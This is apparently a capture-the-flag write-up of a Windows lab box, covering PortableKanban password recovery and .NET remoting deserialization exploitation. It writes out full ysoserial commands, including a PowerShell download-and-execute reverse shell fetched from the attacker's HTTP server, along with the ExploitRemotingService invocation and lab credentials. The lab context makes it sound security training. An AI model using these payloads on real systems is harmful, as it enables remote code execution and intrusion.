System Summary
Initial Enumeration
Nmap scan reveals some classic Windows services open
Enum4linux doesn't show anything valuable.
Port 8888 seems interesting but connecting to it, it seems that it doesn't reply...
Or better: sending to it some input it doesn't reply readable text but from tcpdump we see that it replies an Authentication failure.
It seems that there is a .NET client server application running on it.
It's time to analyze the Kanban application in a Windows machine.
We will need a windows machine with visual studio to proceed
Opening the executable portablekanban.exe with iLSpy we can look into the code.
We can find that it stores the users and their encrypt password in the portablekanban.pk3 file.
Looking deeper we see that uses default crypto in .NET (= DES encryption) and we can also find the Initialization Vector (IV): XuVUm5fR
Opening the file PortableKanban.pk3 we see the encrypted passwords for user lars and administrator:
- Administrator: G2@$btRSHJYTarg
- Lars: G123HHrth234rRG
We have now access to the share \\10.10.10.219\dev which contains a couple of executables and a dll.
Opening the server.exe with iLSpy we see that it listens on port 8888 (so it's the service we discovered with nmap) and it is using .NET remoting library.
This is a library used to execute remote operations on a server by using a client that connects and make remote calls to procedures
Opening the client.exe we see some huicy information:
- Endpoint URL: tcp://10.10.10.219:8888/SecretSharpDebugApplicationEndpoint
- Username: debug
- Password: SharpApplicationDebugUserPassword123!
Looking on the Internet we can find a very interesting C# project from James Forshaw that can be used to send malicious content to server using .NET remoting library.
This project is named ExploitRemotingService and can be easily found on github.
We have to get and compile it with visual studio (community edition is ok).
We will now have an executable named ExploitRemotingServices.exe that will connect to the remote service and send a specially crafted payload (we still have to build it)
User Flag
Next step is to create a proof of concept of payload, like a ping request.
We can use ysoserial, famous tool to create payloads
ysoserial.exe -f BinaryFormatter -o base64 -g TypeConfuseDelegate -c " ping 10.10.14.10"
it will output a long base64 string:
We have to coyp/paste the payload and use it for ExploitRemotingServices.exe
At the same time we can monitor the netowork with wireshark.
The command line is
ExploitRemotingServices.exe -s --rev=4 --password="SharpApplicationDebugUserPassword123!" --user=debug tcp://10.10.10.219:8888/SecretSharpDebugApplicationEndpoint raw <ysoserial payload>
We are able to receive ICMP request from the sharp box: this means that our payload was executed.
Next step is to change the payload from a ping to a reverse shell
Here we need to choose a good reverse shell. After some effort we can grab a good powershell reverse shell here: https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1
We have to customize the first line with our IP address and port. We can also rename the file to rev.txt to avoid filters.
Once done we have to start a local python http server to serve this rev.txt (the usual python http.server or SimpleHTTPServer listening on port 8000)
Then create the reverse shell with ysoserial
ysoserial.exe -f BinaryFormatter -o base64 -g TypeConfuseDelegate -c " powershell IEX (New-object net.webclient).Downloadstring('http://10.10.14.10:8000/rev.txt')"
It will output a long base64 payload that we can copy
Then we can execute a netcat listener (right window) and run again the exploit ExploitRemotingServices.exe (on the left)
Root Flag
- client.getdiskInfo();
- client.getCPUInfo();
- client.getRamInfo();